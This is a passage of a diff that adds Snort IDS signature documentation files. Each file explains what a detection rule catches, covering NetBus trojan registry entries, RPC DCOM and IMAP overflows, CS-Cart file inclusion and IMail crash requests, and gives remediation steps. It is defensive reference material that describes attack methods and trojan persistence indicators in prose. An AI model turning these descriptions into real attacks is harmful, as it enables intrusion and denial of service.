+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+The manual removal of this Trojan should only be attempted by an experienced Windows system administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+
+Registry keys added include:
+
+	Netbus Server Pro
+	PATCH "C:\windows\patch.exe /nomsg" - note: the entry may not necessarily be called PATCH
+	NetBuster = ""
+	SysCopy = "command /c copy %windir%\\keyhook.dl_ %windir%\\*.dll /Y"
+	Rundll32 = "rundll.dl_ /noadd"
+	Rundll = "regedit /s nbsetup2.reg"
+
+Later versions may also add one of these registry entries:
+
+	HKEY_LOCAL_MACHINE/SOFTWARE/UltraAccess Networks/NetBus Server/
+	HKEY_CURRENT_USER/NetBus Server/
+
+These entries should be deleted.
+
+The files rundll.dl_ (note the underscore, this is important) and nbsetup2.reg should be deleted if they exist.
+
+Ending the process is necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS401
+http://www.whitehats.com/info/IDS403
+
+Hackfix.org
+http://www.hackfix.org/netbusfix/index.shtml
+
+Dark-e Trojan Archive
+http://www.dark-e.com/archive/trojans/netbus/index.html
+
+--
--- /dev/null
+++ b/doc/signatures/2180.txt
@@ -0,0 +1,74 @@
+Rule:  
+
+--
+Sid:
+
+2180
+
+--
+Summary:
+
+This event is generated when a BitTorrent client connects to a tracker 
+to gain access to a BitTorrent network.  
+
+--
+Impact:
+
+Possible violation of policy and abuse of network resources.
+
+--
+Detailed Information:
+BitTorrent is a peer-to-peer application used for simultaneous downloads
+of large files.  BitTorrent is designed to allow multiple peers to 
+download large files simultaneously without using extraneous bandwidth 
+from a centralized server.
+
+BitTorrent's centralized server, called a tracker, refers peers to each 
+other. This rule looks for a request sent to a BitTorrent tracker from a
+peer.
+
+--
+Attack Scenarios:
+
+A user downloaded a BitTorrent client and attempts to download files 
+from a BitTorrent network.
+
+--
+Ease of Attack:
+
+Unix, Windows, and MacOS clients are publicly available for BitTorrent.
+
+--
+False Positives:
+
+Other web-based applications could use similar URLs and parameters.
+
+--
+False Negatives:
+
+The URL path "/announce" is hardcoded in the BitTorrent tracker.  If the
+URL was changed in the tracker, then this rule would not generate an 
+event.
+
+--
+Corrective Action:
+
+If this is a violation of network policy, take appropriate steps to 
+prevent further violations.
+
+--
+Contributors:
+
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+
+-- 
+Additional References:
+
+Bittorrent Protocol Specification
+http://bitconjurer.org/BitTorrent/protocol.html
+
+Wikipedia
+http://en.wikipedia.org/wiki/BitTorrent
+
+--
--- /dev/null
+++ b/doc/signatures/1433.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1433
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000437.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000437
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "CS-Cart" application running on a webserver. Access to the file "class.cs_phpmailer.php" using a remote file being passed as the "classes_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "classes_dir" parameter in the "class.cs_phpmailer.php" script used by the "CS-Cart" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CS-Cart
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000534.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000534
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VUBB" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "user" parameter in the "english.php" script 
+used by the "VUBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VUBB
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2156.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2156
+
+--
+Summary:
+This event is generated when an attempt is made to ascertain the status of the Apache module mod_gzip on a host. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to ascertain the status of the Apache module mod_gzip on a host from a source external to the protected network.
+
+mod_gzip is used to compress data sent by an Apache webserver in an attempt to preserve bandwidth and speed up communications between client and server.
+
+The attacker may be trying to gain information on the server by making a query to the mod_gzip_status page. This could lead to information disclusure which might then be used in further attacks against that host.
+
+--
+Affected Systems:
+Any host using the Apache module mod_gzip.
+
+--
+Attack Scenarios:
+An attacker can retrieve information on the server by making a request for the status of mod_gzip. This request would take the form http://www.foo.com/mod_gzip_status
+
+--
+Ease of Attack:
+Simple. No exploit required.
+
+--
+False Positives:
+The event will also be generated if Nessus is used to scan the host for this vulnerability.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable the mod_gzip module.
+
+Disallow access to mod_gzip_status from sources external to the protected network.
+
+Use the Apache directive <Location> to disallow access to the mod_gzip status page to the localhost only in the following manner:
+
+<Location /mod_gzip_status>
+    Order deny,allow
+    Deny from all
+    Allow from localhost
+</Location>
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2280.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2280
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2309.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2309
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2217.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2217
+
+--
+Summary:
+This event is generated when an attempt is made to access printmail.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in Ipswitch IMail 7.04 and earlier.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+Ipswitch IMail is a mail server that supports multiple mail protocols. Its web mail implementation contains a vulnerability in printmail.cgi where, if a mailbox name with more than 248 dot characters (.) is requested, the service will crash. It has also been reported that this is caused by a buffer overflow error that may allow an attacker to execute arbitrary code, but this has not been confirmed.
+
+--
+Affected Systems:
+Mail servers running Ipswitch Imail 7.04 and earlier with web mail enabled.
+
+--
+Attack Scenarios:
+An attacker sends an HTTP request to printmail.cgi for a mailbox with more than 248 dot characters in the mailbox name parameter. The mail server will crash and must be restarted.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user accesses readmail.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer version or apply the vendor-supplied hotfix available at ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail704.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/3427
+
+--
--- /dev/null
+++ b/doc/signatures/115-4.txt
@@ -0,0 +1,69 @@
+
+
+Rule:
+
+--
+Sid:
+115-4
+
+--
+Summary:
+This event is generated when the pre-processor asn1 detects network
+traffic that may constitute an attack. Specifically an asn.1 spec
+violation, indicating a possible overflow attempt was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the asn1 pre-processor detects network
+traffic that may consititute an attack.
+
+This may indicate an attempt to overflow a fixed length buffer in an
+application using the asn1 libraries.
+
+More information on this event can be found in the individual
+pre-processor documentation README.asn1 in the docs directory of the
+snort source. Detailed instructions and examples on how to tune and use
+the pre-processor can also be found in the same document.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ASN1 Information Site:
+http://asn1.elibel.tm.fr/
+
+--
--- /dev/null
+++ b/doc/signatures/2215.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2215
+
+--
+Summary:
+This event is generated when an attempt is made to access nsManager.cgi on an internal web server. This may indicate an attempt to exploit an authentication vulnerability in Alabanza Control Panel 3.0 and earlier.
+
+--
+Impact:
+System integrity.
+
+--
+Detailed Information:
+Alabanza Control Panel 3.0 is an application that manages automated virtual domain administration. It contains a vulnerability which allows an attacker to bypass authentication using specially crafted HTTP requests to add, modify, or delete domains, or change MX and CNAME host information for managed hosts.
+ 
+--
+Affected Systems:
+Any domains managed by an administrator using Alabanza Control Panel 3.0 or earlier.
+
+--
+Attack Scenarios:
+An attacker crafts a URL that adds or deletes a virtual domain and transmits it to nsManager.cgi. The Alabanza Control Panel makes the requested change without prompting for a username or password.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses nsManager.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software, or apply the vendor-provided patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/1710
+
+--
--- /dev/null
+++ b/doc/signatures/3134.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3134
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the processing of a Portable Network Graphics (PNG) file by
+the GD Graphics Library.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that software that handles PNG files,
+libpng, allocates memory for PNG images. A maliciously formatted PNG
+image sent to a vulnerable server may cause a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.  A
+PNG file with an excessively large image height, width, or depth, or
+combination of these can cause a buffer overflow.
+
+--
+Affected Systems:
+	GD Graphics Library 2.0.28 and earlier
+
+--
+Attack Scenarios:
+An attacker can create a malformed PNG file and upload it to a web server,
+possibly causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3188.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3188
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1094.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1094
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2404.txt
@@ -0,0 +1,92 @@
+Rule:
+
+--
+Sid:
+2404
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISS RealSecure and BlackICE products.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the ISS Analysis Module can be triggered
+by an attacker sending a single SMB packet containing an AccountName
+greater than 300 bytes. It is possible for an attacker to exploit this
+condition by sending a specially crafted packet to a host serving network shares.
+
+When the systems running one of the affected ISS products decodes the
+SMB data, exploit code may be included and executed on the machine with 
+system level privileges. Alternatively, the malformed data may cause the service to become 
+unresponsive and cause a DoS condition.
+
+Sensors under attack will display "PAM_internal_error" as a message on
+the console.
+
+Sucessful exploitation of this issue could present an attacker with the 
+opportunity to execute code of their choosing on the target host with system
+privileges. It is also possible for a Denial of Service (DoS) condition to 
+be caused by an attacker attempting to exploit this condition.
+
+--
+Affected Systems:
+	RealSecure Network 7.0, XPU 20.15 through 22.9
+	Real Secure Server Sensor 7.0 XPU 20.16 through 22.9
+	Proventia A Series XPU 20.15 through 22.9
+	Proventia G Series XPU 22.3 through 22.9
+	Proventia M Series XPU 1.3 through 1.7
+	RealSecure Desktop 7.0 eba through ebh
+	RealSecure Desktop 3.6 ebr through ecb
+	RealSecure Guard 3.6 ebr through ecb
+	RealSecure Sentry 3.6 ebr through ecb
+	BlackICE PC Protection 3.6 cbr through ccb
+	BlackICE Server Protection 3.6 cbr through ccb
+
+--
+Attack Scenarios:
+An attacker may use this vulnerability to disable ISS sensors on a
+network or potentially use it to gain control of a machine running one
+of the affected products.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Data transfer between a Windows 2003 file server and other Windows based
+machines may cause this rule to generate events in some circumstances.
+Ensure that the HOME_NET and EXTERNAL_NET variables are correctly set in
+the snort.conf file to negate the effects of file transfers on local
+subnets.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+eEye
+http://www.eeye.com/html/Research/Advisories/AD20040226.html
+
+Bugtraq
+http://www.securityfocus.com/bid/9752
+
+--
--- /dev/null
+++ b/doc/signatures/3392.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3392
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/959.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+959
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2804.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2804
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure send_and_compare_old_values
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/962.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+962
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/915.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+915
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2330.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2330
+
+--
+Summary:
+This event is generated when a remote user sends an overly long string 
+to an IMAP server via the command AUTH. This may indicate an attempt to 
+exploit a buffer overflow condition.
+
+--
+Impact:
+Serious. Possible remote execution of arbitrary code, which may lead to
+a remote root compromise.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the 
+AUTHENTICATE command, a buffer overflow condition may occur. This can 
+allow the attacker to execute arbitrary code, which may allow the 
+attacker to gain root access to the compromised server.
+
+--
+Affected Systems:
+	IMAP servers
+
+--
+Attack Scenarios:
+An attacker can send a sufficiently long AUTHENTICATE command to the 
+IMAP server, creating a buffer overflow condition. This can then allow 
+the attacker to execute code of their choosing and possibly gain root 
+access to the compromised server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/940.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+940
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
